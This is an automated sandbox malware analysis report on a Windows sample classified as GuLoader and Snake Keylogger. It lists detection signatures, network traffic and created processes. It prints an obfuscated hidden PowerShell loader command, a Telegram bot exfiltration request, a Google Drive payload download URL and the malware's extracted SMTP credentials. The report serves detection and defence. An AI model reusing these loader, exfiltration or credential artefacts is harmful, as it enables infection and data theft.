Windows Analysis Report
Adeleidae.exe

Overview

General Information

Sample name: Adeleidae.exe
Analysis ID: 1540728
MD5: 9f3c578444b7f35f3d25eadd5695c162
SHA1: 4e06953078fc5119a5d0a13b8b62dd58bf81eac3
SHA256: d783f362c426661574a149a0bd801223273fe02c26b3d154de21fdb9516caf86

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: Adeleidae.exe Avira: detected
Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe Avira: detection malicious, Label: HEUR/AGEN.1333748
Source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe ReversingLabs: Detection: 13%
Source: Adeleidae.exe ReversingLabs: Detection: 13%
Source: Adeleidae.exe Virustotal: Detection: 22%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF87A8 CryptUnprotectData, 6_2_27EF87A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF8EF1 CryptUnprotectData, 6_2_27EF8EF1
Source: Adeleidae.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49933 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: Adeleidae.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdbt source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdbfu source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405846
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406398 FindFirstFileW,FindClose, 0_2_00406398
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.4:50022 -> 213.165.67.102:587
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1
    Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 213.165.67.102
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49945 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49961 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49918 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50001 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49877 -> 142.250.185.78:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49967 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: smtp.ionos.es
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Thu, 24 Oct 2024 01:41:09 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
Source: powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: Adeleidae.exe, 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Adeleidae.exe, 00000000.00000000.1748229862.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.ionos.es
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://status.geotrust.com0
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025923000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.3023161132.000000002592D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/A
Source: msiexec.exe, 00000006.00000002.3022462805.0000000024E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh17
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1y
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/(
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/F
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/o
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71
Source: msiexec.exe, 00000006.00000002.3023161132.00000000257E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71$
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.3023161132.000000002595E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052F3

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032A0
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Windows\resources\Nebengeschfter.ini
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Windows\Fonts\thyrididae.ini
Source: Adeleidae.exe Static PE information: invalid certificate
Source: Adeleidae.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/19@6/6
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032A0
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045B4
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00402095 CoCreateInstance, 0_2_00402095
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Users\user\AppData\Local\peritonealizing
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Users\user\AppData\Local\Temp\nsqC038.tmp
Source: Adeleidae.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\Adeleidae.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Adeleidae.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Adeleidae.exe ReversingLabs: Detection: 13%
Source: Adeleidae.exe Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\Adeleidae.exe File read: C:\Users\user\Desktop\Adeleidae.exe
Source: unknown Process created: C:\Users\user\Desktop\Adeleidae.exe "C:\Users\user\Desktop\Adeleidae.exe"
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
